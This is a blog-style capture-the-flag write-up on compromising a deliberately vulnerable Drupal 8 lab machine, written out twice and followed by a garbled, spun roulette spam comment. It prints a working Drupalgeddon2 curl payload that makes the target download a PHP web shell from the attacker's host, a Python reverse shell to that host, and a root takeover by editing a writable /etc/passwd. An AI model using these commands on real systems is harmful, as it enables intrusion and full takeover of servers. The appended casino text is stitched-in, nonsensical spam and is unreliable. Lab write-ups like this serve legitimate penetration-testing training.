Hello Friends,
This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.
Let's get started ...
Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.
The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.
I used following command to download a php web shell -
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
Thanks for reading .Happy Hacking ;)
This is my first boot2root writeup on a vuln machine made by my brother Manish Kishan Tanwar .
This machine is based on latest vulnerability of Drupal CMS.
Let's get started ...
Since port 80 was open , therefore I tried testing the webapp. After looking at the source code , it was clear that the website was running on a cms called drupal.I verified the version of drupal from changelog.txt.
The cms version of drupal used was 8.x. Suddenly something clicked my mind and I thought of giving a try for the famous drupalgeddon2 exploit.I tried exploiting through curl.
I used following command to download a php web shell -
curl -s -X 'POST' --data 'mail[%23post_render][]=exec&mail[%23children]='"wget http://192.168.1.78/ninja.php"'&form_id=user_register_form' 'http://192.168.1.108/user/register?element_parents=account/mail/%23value&ajax_form=1' | cut -d ":" -f5
Through php shell , I got reverse shell on netcat by using python reverse shell command.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.78",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell which I got was not interactive and therefore I needed to spawn tty using- python -c 'import pty;pty.spawn("bin/sh")' command
I tried multiple things including running some kernel exploits etc. I found that /etc/passwd was having all the permissions and I was able to edit this file.I saw that there was a account present in /etc/passwd file with some encrypted hashes.I saw similar thing during my oscp lab and therefore tried adding my root password hash into passwd root user entry.
If a password hash is present in the second column in /etc/passwd, it takes precedence over the one in /etc/shadow and thus I was able to login as root .
Thanks for reading .Happy Hacking ;)
It comes 포커 with 36 common numbers and one green zero, and 2 of|and a pair of}.70% house edge. The roulette wheel is precision-engineered by Cammegh of their manufacturing unit in Kent, utilizing the identical exacting manufacturing methods and supplies used of their on line casino grade wheels. Cammegh’s signature scalloped separators contrast elegantly with the piano gloss black end of the Bond wheel, while the curved ball-stops ensure most randomness in every sport. A massive monetary loss is certain in lengthy term|the lengthy run} if the participant continued to employ this technique. Another technique is the Fibonacci system, the place bets are calculated according to the Fibonacci sequence.
ReplyDelete